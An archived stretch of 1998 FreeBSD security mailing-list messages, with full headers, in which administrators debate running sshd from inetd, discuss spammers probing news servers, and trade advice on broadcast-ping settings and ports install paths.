khavrinen.lcs.mit.edu (8.9.1/8.9.1) id LAA26468; Mon, 14 Sep 1998 11:27:30 -0400 (EDT) (envelope-from wollman) Date: Mon, 14 Sep 1998 11:27:30 -0400 (EDT) From: Garrett Wollman Message-Id: <199809141527.LAA26468@khavrinen.lcs.mit.edu> To: Michael Maxwell Cc: freebsd-security@FreeBSD.ORG Subject: innd 1.7.2 issues... In-Reply-To: <19980914081048.A27142@drwho.xnet.com> References: <19980914081048.A27142@drwho.xnet.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > I noticed that I have been getting several refused connections to my nnrpd > port -- naturally I disallow all connections outside my local site, so the > logs show the connection as "no permission". There are many spammers out there who scan the Path: headers in received news looking for poorly-configured news servers which might allow open posting so they can inject their tripe. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 09:02:57 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA24325 for freebsd-security-outgoing; Mon, 14 Sep 1998 09:02:57 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from roble.com (roble.com [207.5.40.50]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA24319 for ; Mon, 14 Sep 1998 09:02:51 -0700 (PDT) (envelope-from sendmail@roble.com) Received: from localhost (localhost [127.0.0.1]) by roble.com (Roble) with SMTP id JAA27503 for ; Mon, 14 Sep 1998 09:02:30 -0700 (PDT) Date: Mon, 14 Sep 1998 09:02:30 -0700 (PDT) From: Roger Marquis To: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 14 Sep 1998, spork wrote: > Number of times sshd died: 0 > ... A common data point but there's also the shell that is spawned by sshd and applications spawned by the shell. Any of those can hang a session too. The most common problem I've seen is corrupt terminal definitions that no combination of setenv, tset and reset will fix. > If you really need a backup access method, get a console server :) Have that too but there are many situations where it's not feasible. The real issue, it seems to me, is consistency. If ftp, telnet, rsh, rlogin, etc. run from inetd then sshd should also. The original reason it wasn't is the key generation delay, which isn't an issue on anything faster than a 486/25. Roger Marquis Roble Systems Consulting http://www.roble.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 10:06:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA06521 for freebsd-security-outgoing; Mon, 14 Sep 1998 10:06:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id KAA06502 for ; Mon, 14 Sep 1998 10:06:15 -0700 (PDT) (envelope-from sthaug@nethelp.no) From: sthaug@nethelp.no Received: (qmail 4811 invoked by uid 1001); 14 Sep 1998 17:05:57 +0000 (GMT) To: marquis@roble.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: Your message of "Mon, 14 Sep 1998 09:02:30 -0700 (PDT)" References: X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Mon, 14 Sep 1998 19:05:57 +0200 Message-ID: <4809.905792757@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > The real issue, it seems to me, is consistency. If ftp, telnet, rsh, > rlogin, etc. run from inetd then sshd should also. The original reason it > wasn't is the key generation delay, which isn't an issue on anything > faster than a 486/25. That may be the real issue for you - not necessarily for everybody. Also, the key generation delay is certainly measurable. Running "ssh host date" between two P-166 machines: - sshd running as daemon: 1 - 1.2 seconds - sshd running from inetd: 4 - 5 seconds That difference may not be significant for a long term login session, but could easily be significant for rsh type use. Myself, I have turned off most services in /etc/inetd.conf. The fewer services that run, the fewer possible holes. I *definitely* don't run rsh and rlogin. For high security situations I recommend against using the standard inetd - better to use for instance Marcus Ranum's mini-inetd (79 lines) where you can more easily convince yourself that the code does what you want. Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 10:29:53 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA08679 for freebsd-security-outgoing; Mon, 14 Sep 1998 10:29:53 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from echonyc.com (echonyc.com [198.67.15.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA08671 for ; Mon, 14 Sep 1998 10:29:51 -0700 (PDT) (envelope-from benedict@echonyc.com) Received: from localhost by echonyc.com (8.9.1/8.9.1) with SMTP id NAA21219; Mon, 14 Sep 1998 13:29:28 -0400 (EDT) Date: Mon, 14 Sep 1998 13:29:28 -0400 (EDT) From: Snob Art Genre Reply-To: ben@rosengart.com To: Liam Slusser cc: security@FreeBSD.ORG Subject: Re: smurf and broadcast packets.. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 14 Sep 1998, Liam Slusser wrote: > changed it to 0, and from there...i ran into a wierd > problem. My server has two network cards in it, ed0 (internet side, > 24.0.185.89) and ed1 (internal network, 10.0.0.1), and runs natd. When i > turned net.inet.icmp.bmcastecho to 0..i could not ping 10.0.0.255 but i > could ping my internet side 24.0.189.255. Not so weird. The broadcast address on your internal network is probably 10.255.255.255. Ben "You have your mind on computers, it seems." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 10:32:48 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA09164 for freebsd-security-outgoing; Mon, 14 Sep 1998 10:32:48 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dworkin.amber.org (dworkin.amber.org [209.31.146.74]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA09144 for ; Mon, 14 Sep 1998 10:32:38 -0700 (PDT) (envelope-from petrilli@dworkin.amber.org) Received: (from petrilli@localhost) by dworkin.amber.org (8.9.0/8.9.0) id NAA08920; Mon, 14 Sep 1998 13:32:21 -0400 (EDT) Message-ID: <19980914133221.57736@amber.org> Date: Mon, 14 Sep 1998 13:32:21 -0400 From: "Christopher G. Petrilli" To: freebsd-security@FreeBSD.ORG Subject: Re: sshd Mail-Followup-To: freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.89.1i In-Reply-To: ; from Roger Marquis on Mon, Sep 14, 1998 at 09:02:30AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Sep 14, 1998 at 09:02:30AM -0700, Roger Marquis wrote: > On Mon, 14 Sep 1998, spork wrote: > > Number of times sshd died: 0 > > A common data point but there's also the shell that is spawned by sshd and > applications spawned by the shell. Any of those can hang a session > too. The most common problem I've seen is corrupt terminal definitions > that no combination of setenv, tset and reset will fix. Just a small data point as well, I've had sshd running on 4 different machines I own as the ONLY way to get into them (no inetd running on any of them), and guess what? I've never had a problem, ever in a sum-total of 3 1/2 machine years. Reliability is obviously not the reason to do this. > > > If you really need a backup access method, get a console server :) > > Have that too but there are many situations where it's not feasible. > > The real issue, it seems to me, is consistency. If ftp, telnet, rsh, > rlogin, etc. run from inetd then sshd should also. The original reason it > wasn't is the key generation delay, which isn't an issue on anything > faster than a 486/25. Then we should run xntpd out of inetd, do you run httpd out of inetd? :-) really, this is just silly... if at all possible ,get rid of inetd, it's a huge problem as it is, and it will just wholesale eliminate all the problems ;-) well, not all of themn, but a large chunk. Chris -- | Christopher Petrilli | petrilli@amber.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 10:43:00 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA11512 for freebsd-security-outgoing; Mon, 14 Sep 1998 10:43:00 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from drwho.xnet.com (drwho.xnet.com [205.243.140.183]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA11503 for ; Mon, 14 Sep 1998 10:42:56 -0700 (PDT) (envelope-from drwho@drwho.xnet.com) Received: (from drwho@localhost) by drwho.xnet.com (8.8.8/8.8.8) id MAA05043; Mon, 14 Sep 1998 12:42:39 -0500 (CDT) (envelope-from drwho) Message-ID: <19980914124239.A5031@drwho.xnet.com> Date: Mon, 14 Sep 1998 12:42:39 -0500 From: Michael Maxwell To: freebsd-security@FreeBSD.ORG Subject: Re: innd 1.7.2 issues... Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <19980914081048.A27142@drwho.xnet.com> <199809141527.LAA26468@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.91i In-Reply-To: <199809141527.LAA26468@khavrinen.lcs.mit.edu>; from Garrett Wollman on Mon, Sep 14, 1998 at 11:27:30AM -0400 X-Useless-Header: http://www.xnet.com/~drwho/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Sep 14, 1998 at 11:27:30AM -0400, Garrett Wollman wrote: > < said: > > > I noticed that I have been getting several refused connections to my nnrpd > > port -- naturally I disallow all connections outside my local site, so the > > logs show the connection as "no permission". > > There are many spammers out there who scan the Path: headers in > received news looking for poorly-configured news servers which might > allow open posting so they can inject their tripe. > Ok, this would make sense as I recognized one of the connections being from a known spam domain (club-internet.fr) whom I've dealt with regarding their spamming in the past. I just found it interesting that this has only just started to occur. -- drwho @ xnet.com -- http://www.xnet.com/~drwho/ "Freedom of government is good, but freedom FROM government is better." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 13:06:06 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA06335 for freebsd-security-outgoing; Mon, 14 Sep 1998 13:06:06 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from trauco.colomsat.net.co (trauco.colomsat.net.co [200.13.195.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA06239 for ; Mon, 14 Sep 1998 13:05:59 -0700 (PDT) (envelope-from y-carden@uniandes.edu.co) Received: from [206.156.157.194] ([206.156.157.194]) by trauco.colomsat.net.co (8.8.8/8.8.8) with SMTP id PAA24216 for ; Mon, 14 Sep 1998 15:07:48 -0500 (GMT) Message-ID: <35FD78A1.19BB2797@uniandes.edu.co> Received: from OFC069 by [206.156.157.194] via smtpd (for trauco.colomsat.net.co [200.13.195.2]) with SMTP; 14 Sep 1997 20:07:25 UT Date: Mon, 14 Sep 1998 15:12:17 -0500 From: Yonny Cardenas Baron Organization: Panamco Indega S.A X-Mailer: Mozilla 4.05 [en] (Win95; I) MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: (no subject) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org auth 7c1689f4 unsubscribe freebsd-security y-carden@uniandes.edu.co To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 13:21:53 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA09205 for freebsd-security-outgoing; Mon, 14 Sep 1998 13:21:53 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA09171; Mon, 14 Sep 1998 13:21:46 -0700 (PDT) (envelope-from archie@whistle.com) Received: (from smap@localhost) by whistle.com (8.7.5/8.6.12) id NAA03427; Mon, 14 Sep 1998 13:21:22 -0700 (PDT) Received: from bubba.whistle.com(207.76.205.7) by whistle.com via smap (V1.3) id sma003422; Mon Sep 14 13:21:17 1998 Received: (from archie@localhost) by bubba.whistle.com (8.8.7/8.6.12) id NAA05491; Mon, 14 Sep 1998 13:21:17 -0700 (PDT) From: Archie Cobbs Message-Id: <199809142021.NAA05491@bubba.whistle.com> Subject: Re: sshd In-Reply-To: <000201bde014$4f3e1b80$ca2aa8c0@ripley.tavari.muc.de> from Lutz Albers at "Sep 14, 98 09:17:26 pm" To: lutz@muc.de (Lutz Albers) Date: Mon, 14 Sep 1998 13:21:17 -0700 (PDT) Cc: freebsd-security@FreeBSD.ORG, ports@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Lutz Albers writes: > > > A more frustrating problem for me are ports that are not > > > ${PREFIX} != /usr/local compatible which makes it a hassle to > > > install multiple version of a port or separate ports that have > > > common files. Also, I occasionaly go through phases of liking > > > SysV way of installing things in /opt/, > > > /etc/opt/ and /var/opt/ which a simple 'make > > > PREFIX=/opt/' doesn't really accomplish. > > > > If someone was interested, it would be easy to write a script > > that checks all the ports: > > (receipe for detecting misbehaving ports deleted) > > This will fail for X11 ports IMHO. The last time I checked they were > installed into X11ROOT (/usr/X11R6). OK.. so amend the recipie accordingly to allow for this. We could also add a "make check" target to bsd.port.mk that would check any individual port for problems. -Archie ___________________________________________________________________________ Archie Cobbs * Whistle Communications, Inc. * http://www.whistle.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 13:50:01 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA14864 for freebsd-security-outgoing; Mon, 14 Sep 1998 13:50:01 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id NAA14825 for ; Mon, 14 Sep 1998 13:49:59 -0700 (PDT) (envelope-from sthaug@nethelp.no) From: sthaug@nethelp.no Received: (qmail 7642 invoked by uid 1001); 14 Sep 1998 20:49:39 +0000 (GMT) To: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: Your message of "Mon, 14 Sep 1998 19:05:57 +0200" References: <4809.905792757@verdi.nethelp.no> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Mon, 14 Sep 1998 22:49:39 +0200 Message-ID: <7640.905806179@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I had a question about this: > For high security situations I recommend against using the > standard inetd - better to use for instance Marcus Ranum's mini-inetd > (79 lines) where you can more easily convince yourself that the code does > what you want. so in case anybody is interested, the original Usenet message from Marcus Ranum, with the whole 79 line inetd replacement, is available at http://www.nethelp.no/net/inetd-mjr.txt Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 13:55:28 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA16287 for freebsd-security-outgoing; Mon, 14 Sep 1998 13:55:28 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dt053nb4.san.rr.com (dt053nb4.san.rr.com [204.210.34.180]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA16259 for ; Mon, 14 Sep 1998 13:55:23 -0700 (PDT) (envelope-from Studded@dal.net) Received: from dal.net (Studded@localhost [127.0.0.1]) by dt053nb4.san.rr.com (8.8.8/8.8.8) with ESMTP id NAA00778; Mon, 14 Sep 1998 13:55:05 -0700 (PDT) (envelope-from Studded@dal.net) Message-ID: <35FD82A8.84601D49@dal.net> Date: Mon, 14 Sep 1998 13:55:04 -0700 From: Studded Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.06 [en] (X11; I; FreeBSD 2.2.7-STABLE-0914 i386) MIME-Version: 1.0 To: Roger Marquis CC: freebsd-security@FreeBSD.ORG Subject: Re: sshd References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Roger Marquis wrote: > The real issue, it seems to me, is consistency. If ftp, telnet, rsh, > rlogin, etc. run from inetd then sshd should also. Foolish consistency is the hobgoblin of small minds. I am also in the camp of those who disable inetd almost universally, and run sshd standalone. Since I don't think either camp is going to convince the other, perhaps we should let this drop? Doug -- *** Chief Operations Officer, DALnet IRC network *** "Yes, the president should resign. He has lied to the American people, time and time again, and betrayed their trust. He is no longer an effective leader. Since he has admitted guilt, there is no reason to put the American people through an impeachment. He will serve absolutely no purpose in finishing out his term; the only possible solution is for the president to save some dignity and resign." - William Jefferson Clinton, 1974 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 14:10:27 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA21116 for freebsd-security-outgoing; Mon, 14 Sep 1998 14:10:27 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from whorfin.sjca.edu (whorfin.sjca.edu [199.89.180.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA20967 for ; Mon, 14 Sep 1998 14:10:00 -0700 (PDT) (envelope-from j-emmons@sjca.edu) Received: from localhost (skia@localhost) by whorfin.sjca.edu (8.8.7/8.8.5) with SMTP id RAA26684 for ; Mon, 14 Sep 1998 17:08:57 -0400 (EDT) Date: Mon, 14 Sep 1998 17:08:57 -0400 (EDT) From: "Josh Emmons (skia)" To: freebsd-security@FreeBSD.ORG Subject: Re: (no subject) In-Reply-To: <35FD78A1.19BB2797@uniandes.edu.co> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > auth 7c1689f4 unsubscribe freebsd-security y-carden@uniandes.edu.co ^^^^^^^^ And this is posted on security... heh heh heh... Josh Emmons...j-emmons@sjca.edu ``...great feelings will often take the aspect of error, and great faith the aspect of illusion.'' - George Eliot To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 15:17:49 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA04092 for freebsd-security-outgoing; Mon, 14 Sep 1998 15:17:49 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from roble.com (roble.com [207.5.40.50]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA04070; Mon, 14 Sep 1998 15:17:46 -0700 (PDT) (envelope-from sendmail@roble.com) Received: from localhost (localhost [127.0.0.1]) by roble.com (Roble) with SMTP id PAA28919; Mon, 14 Sep 1998 15:17:28 -0700 (PDT) Date: Mon, 14 Sep 1998 15:17:28 -0700 (PDT) From: Roger Marquis To: freebsd-security@FreeBSD.ORG, ports@FreeBSD.ORG Subject: Re: sshd In-Reply-To: <199809142021.NAA05491@bubba.whistle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 14 Sep 1998, Archie Cobbs wrote: > We could also add a "make check" target to bsd.port.mk that would > check any individual port for problems. That would certainly qualify as good Quality Assurance, especially if it were done before each release and the non-compliant ports were fixed or eliminated. Roger Marquis Roble Systems Consulting http://www.roble.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 15:30:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA07059 for freebsd-security-outgoing; Mon, 14 Sep 1998 15:30:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from orbital.tiora.net (cx31658-a.escnd1.sdca.home.com [24.0.185.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA07051 for ; Mon, 14 Sep 1998 15:30:19 -0700 (PDT) (envelope-from liam@orbital.tiora.net) Received: from localhost (liam@localhost) by orbital.tiora.net (8.9.1a/8.9.1a+rbl+antispam+zol_hack) with SMTP id PAA07061; Mon, 14 Sep 1998 15:10:38 -0700 (PDT) Date: Mon, 14 Sep 1998 15:10:38 -0700 (PDT) From: Liam Slusser To: ben@rosengart.com cc: security@FreeBSD.ORG Subject: Re: smurf and broadcast packets.. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I checked my internal network..the netmask is 255.255.255.0 and the broadcast is 10.0.0.255. ;) liam System Administrator Tiora Networks | www.tiora.net <---- tiora's webpage www.tiora.net/~liam <----- homepage | liam@tiora.net <-- my email address Lowered turbo powered Honda Civic's are really cool. <---------- my quote On Mon, 14 Sep 1998, Snob Art Genre wrote: > On Mon, 14 Sep 1998, Liam Slusser wrote: > > > changed it to 0, and from there...i ran into a wierd > > problem. My server has two network cards in it, ed0 (internet side, > > 24.0.185.89) and ed1 (internal network, 10.0.0.1), and runs natd. When i > > turned net.inet.icmp.bmcastecho to 0..i could not ping 10.0.0.255 but i > > could ping my internet side 24.0.189.255. > > Not so weird. The broadcast address on your internal network is > probably 10.255.255.255. > > > Ben > > "You have your mind on computers, it seems." > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 17:43:12 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA29171 for freebsd-security-outgoing; Mon, 14 Sep 1998 17:43:12 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from kendra.ne.mediaone.net (kendra.ne.mediaone.net [24.128.94.182]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA29162 for ; Mon, 14 Sep 1998 17:43:09 -0700 (PDT) (envelope-from software@kew.com) Received: from sonata.hh.kew.com (root@sonata-dmz.hh.kew.com [192.168.205.1]) by kendra.ne.mediaone.net (8.9.1/8.9.1) with ESMTP id UAA03957; Mon, 14 Sep 1998 20:42:51 -0400 (EDT) Received: from ffactory.uucp.kew.com (ffactory.hh.kew.com [192.168.203.131]) by sonata.hh.kew.com (8.9.1/8.9.1) with SMTP id UAA06287; Mon, 14 Sep 1998 20:42:49 -0400 (EDT) Received: from kew.com by ffactory.uucp.kew.com (UUPC/extended 1.13d) with UUCP for multiple addressees; Mon, 14 Sep 1998 20:42:49 -0500 Received: from kew.com by ffactory.uucp.kew.com (UUPC/extended 1.13d) with ESMTP for multiple addresses; Mon, 14 Sep 1998 20:42:46 -0500 Message-ID: <35FDB805.D2F16703@kew.com> Date: Mon, 14 Sep 1998 20:42:45 -0400 From: Drew Derbyshire Organization: Kendra Electronic Wonderworks, Stoneham, MA 02180 (http://www.kew.com) X-Mailer: Mozilla 4.05 [en] (WinNT; U) MIME-Version: 1.0 To: Roger Marquis Subject: Re: sshd References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Roger Marquis wrote: > The real issue, it seems to me, is consistency. If ftp, telnet, rsh, > rlogin, etc. run from inetd then sshd should also. The original reason it > wasn't is the key generation delay, which isn't an issue on anything > faster than a 486/25. It's still an issue (10+ seconds) on a 486/66, which loafs otherwise as my outer firewall. Pentiums, perhaps. In any case, I find if it works properly as the port installs it, I use the default. -ahd- -- Drew Derbyshire UUPC/extended e-mail: software@kew.com Telephone: 617-279-9812 "I'm only human, flesh and blood, a man. Human, born to make mistakes . . ." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 18:12:10 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA02389 for freebsd-security-outgoing; Mon, 14 Sep 1998 18:12:10 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from roble.com (roble.com [207.5.40.50]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA02379 for ; Mon, 14 Sep 1998 18:12:06 -0700 (PDT) (envelope-from sendmail@roble.com) Received: from localhost (localhost [127.0.0.1]) by roble.com (Roble) with SMTP id SAA29862 for ; Mon, 14 Sep 1998 18:11:45 -0700 (PDT) Date: Mon, 14 Sep 1998 18:11:45 -0700 (PDT) From: Roger Marquis To: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: <35FD82A8.84601D49@dal.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 14 Sep 1998, Studded wrote: > Foolish consistency is the hobgoblin of small minds. I am also in the > camp of those who disable inetd almost universally, and run sshd > standalone. Since I don't think either camp is going to convince the > other, perhaps we should let this drop? Au contraire, consistency is fundamental to good systems administration. KISS and consistency are what keeps the Macintosh alive despite all odds. KISS, consistency and efficiency are what keeps sites with dozens or hundreds of Unix boxes running with high uptime and a small staff. If you don't need inetd then it's probably a good idea to disable it and run all your daemons all the time however most hosts, including firewalls, do use it. Is there a significant security (or other) reason to disable it? Roger Marquis Roble Systems Consulting http://www.roble.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 18:27:40 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA04443 for freebsd-security-outgoing; Mon, 14 Sep 1998 18:27:40 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from relay.nuxi.com (nuxi.cs.ucdavis.edu [128.120.56.38]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA04438; Mon, 14 Sep 1998 18:27:39 -0700 (PDT) (envelope-from obrien@dragon.nuxi.com) Received: from dragon.nuxi.com (d96-072.orchard2.ucdavis.edu [169.237.96.72]) by relay.nuxi.com (8.8.8/8.6.12) with ESMTP id SAA13038; Mon, 14 Sep 1998 18:27:24 -0700 (PDT) Received: (from obrien@localhost) by dragon.nuxi.com (8.8.8/8.8.8) id BAA17760; Tue, 15 Sep 1998 01:27:17 GMT (envelope-from obrien) Message-ID: <19980914182717.A17745@nuxi.com> Date: Mon, 14 Sep 1998 18:27:17 -0700 From: "David O'Brien" To: David Gilbert , John Fieber Cc: Roger Marquis , freebsd-security@FreeBSD.ORG, ports@FreeBSD.ORG Subject: Re: sshd Reply-To: obrien@NUXI.com References: <199809140152.VAA28566@trooper.velocet.ca> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <199809140152.VAA28566@trooper.velocet.ca>; from David Gilbert on Sun, Sep 13, 1998 at 09:52:10PM -0400 X-Operating-System: FreeBSD 3.0-19980804-SNAP Organization: The NUXI BSD group X-PGP-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Keyid: 34F9F9D5 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > heard complaints in our shop is that we can't really use /usr/local > for local things anymore because ports live there --- and we desire > the ability to blow away easily recreated ports while retaining hand > built extras. That's why I had to create /usr/treats on all my machines. :( -- -- David (obrien@NUXI.com -or- obrien@FreeBSD.org) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 19:00:33 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA09308 for freebsd-security-outgoing; Mon, 14 Sep 1998 19:00:33 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from colin.muc.de (colin.muc.de [193.174.4.1]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id TAA09274; Mon, 14 Sep 1998 19:00:21 -0700 (PDT) (envelope-from lutz@muc.de) Received: from tavari.muc.de ([193.174.4.22]) by colin.muc.de with SMTP id <140559-3>; Mon, 14 Sep 1998 22:17:14 +0200 Received: (from daemon@localhost) by tavari.muc.de (8.8.8/8.8.7) id VAA12104; Mon, 14 Sep 1998 